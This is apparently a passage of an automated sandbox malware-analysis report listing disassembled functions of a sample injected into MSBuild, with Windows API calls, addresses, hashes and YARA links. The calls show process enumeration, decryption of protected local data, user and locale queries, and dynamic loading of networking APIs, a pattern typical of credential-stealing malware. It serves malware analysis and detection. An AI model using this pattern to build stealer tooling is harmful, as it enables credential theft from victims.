                                                                                                                                                                                                                                                                            • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 562399079-0
                                                                                                                                                                                                                                                                            • Opcode ID: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                            • Instruction ID: 0017932ee8b28542c993bd3d3cbb85d98208f81dbbf63d1189c3c8f2ca0ceaa0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28217E71A00118EBCB10DFD5DC45BEEB7BDAB89B14F00416EE505A3291DBB86A488BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00411BD0 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C09
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00411C19
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411C2B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,?), ref: 00411C40
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411C62
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                            • Instruction ID: 783bd51883fbc9235abcb4e0eac7fc77d01b721e3b4511d284faf66e1083b937
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6211BF76A01518ABC711CF89DC45BDEF7B9FB85711F10429AF905D3250D7785A40CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004103E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                                                            • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                                            • Opcode ID: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                            • Instruction ID: 28db25313739fa7c55f0f4920395dc49f99e05777687f376b1cd2e96ad76a857
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54115E71A00219DBCB14DBD8D885BFDB7B9BB44300F54406EE605A3182DB785A89CBA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00406FD0 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2068576380-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                            • Instruction ID: fbb42ef7c5f833057219cfc16333224a6ea03084bd53acd7e7d5f17b1ae716ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77011279A00209ABEB10DF98DC55FAA77B9EB88700F104559FB00AB380D675E9018B94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410220 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                            • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                                            • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                            • Opcode ID: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                                                            • Instruction ID: 3be55b1de734e5e70e2884e79743f6c7e3890d625af739cc694376e2c6be9e3c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17D012B590011CDBC710DB90EC85AAAB7BDAB48600F404695EF05A2140E6756A1D8AE5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004188E0 Relevance: 252.7, APIs: 114, Strings: 30, Instructions: 691libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33C78), ref: 004188F5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33BD8), ref: 0041890D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E372C0), ref: 00418926
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37338), ref: 0041893E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E372D8), ref: 00418956
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37278), ref: 0041896F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E30D98), ref: 00418987
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37308), ref: 0041899F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37320), ref: 004189B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37290), ref: 004189D0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E372A8), ref: 004189E8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33C58), ref: 00418A01
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33A78), ref: 00418A19
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33998), ref: 00418A31
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33AB8), ref: 00418A4A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37128), ref: 00418A62
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E36FC0), ref: 00418A7A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E30EB0), ref: 00418A93
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33AD8), ref: 00418AAB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E36FA8), ref: 00418AC3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E370E0), ref: 00418ADC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E36FD8), ref: 00418AF4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37230), ref: 00418B0C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33C98), ref: 00418B25
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37158), ref: 00418B3D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E370F8), ref: 00418B55
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E371E8), ref: 00418B6E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37110), ref: 00418B86
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E36F90), ref: 00418B9E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37170), ref: 00418BB7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37140), ref: 00418BCF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37050), ref: 00418BE7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E36FF0), ref: 00418C00
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E30120), ref: 00418C18
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37068), ref: 00418C30
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37008), ref: 00418C49
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E339B8), ref: 00418C61
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37038), ref: 00418C79
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E339D8), ref: 00418C92
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37200), ref: 00418CAA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E37020), ref: 00418CC2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33C18), ref: 00418CDB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B38), ref: 00418CF3
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37218,00417D7D,?,00000040,00000064,00414180,00413720,?,0000002C,00000064,004140D0,00414120,?,00000024,00000064,00414080), ref: 00418D05
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37248), ref: 00418D16
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37080), ref: 00418D28
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37260), ref: 00418D3A
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37098), ref: 00418D4B
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E370B0), ref: 00418D5D
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E370C8), ref: 00418D6F
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37188), ref: 00418D80
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D90
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E339F8), ref: 00418DAC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E371A0), ref: 00418DC4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E2E570), ref: 00418DDD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E371B8), ref: 00418DF5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E33B58), ref: 00418E0D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E30ED8), ref: 00418E2D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E338F8), ref: 00418E45
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E31018), ref: 00418E5E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E36F78), ref: 00418E76
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E371D0), ref: 00418E8E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E338D8), ref: 00418EA7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E33C38), ref: 00418EBF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00E38D60), ref: 00418ED7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00E33A38), ref: 00418EF3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00E33AF8), ref: 00418F0B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00E38B38), ref: 00418F24
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00E38CD0), ref: 00418F3C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00E39478), ref: 00418F54
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E30E38), ref: 00418F74
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E31068), ref: 00418F8C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E38B98), ref: 00418FA5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E394D8), ref: 00418FBD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E39638), ref: 00418FD5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00E30DE8), ref: 00418FEE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E38C40), ref: 0041900E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E39658), ref: 00419026
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E2E590), ref: 0041903F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E38DA8), ref: 00419057
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E38D78), ref: 0041906F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E39378), ref: 00419088
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E39598), ref: 004190A0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E38BC8), ref: 004190B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E38C70), ref: 004190D1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E395B8), ref: 004190ED
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E38DD8), ref: 00419105
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E38D48), ref: 0041911E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E38CE8), ref: 00419136
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E38C58), ref: 0041914E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00E39558), ref: 0041916A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00E395F8), ref: 00419182
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75DA0000,00E394F8), ref: 0041919E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75DA0000,00E38BF8), ref: 004191B6
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E395D8), ref: 004191D6
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39418), ref: 004191EE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39578), ref: 00419207
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E38B68), ref: 0041921F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39518), ref: 00419237
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39618), ref: 00419250
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39678), ref: 00419268
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00E39698), ref: 00419280
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419297
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004192AE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00E38C10), ref: 004192CA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00E2E5C0), ref: 004192E2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00E38C28), ref: 004192FB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00E38CA0), ref: 00419313
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00E39458), ref: 0041932F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6E2B0000,00E38B80), ref: 0041934B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6E2B0000,00E39538), ref: 00419363
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6E2B0000,00E38B08), ref: 0041937C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6E2B0000,00E38DC0), ref: 00419394
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6CDF0000,SymMatchString), ref: 004193AE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: p$ s$(q$0r$8:$8;$8<$8p$8s$@q$Hr$HttpQueryInfoA$InternetSetOptionA$Pp$SymMatchString$X;$X<$Xq$`r$dbghelp.dll$hp$pq$p$x:$x<$xo$xr$$p$q
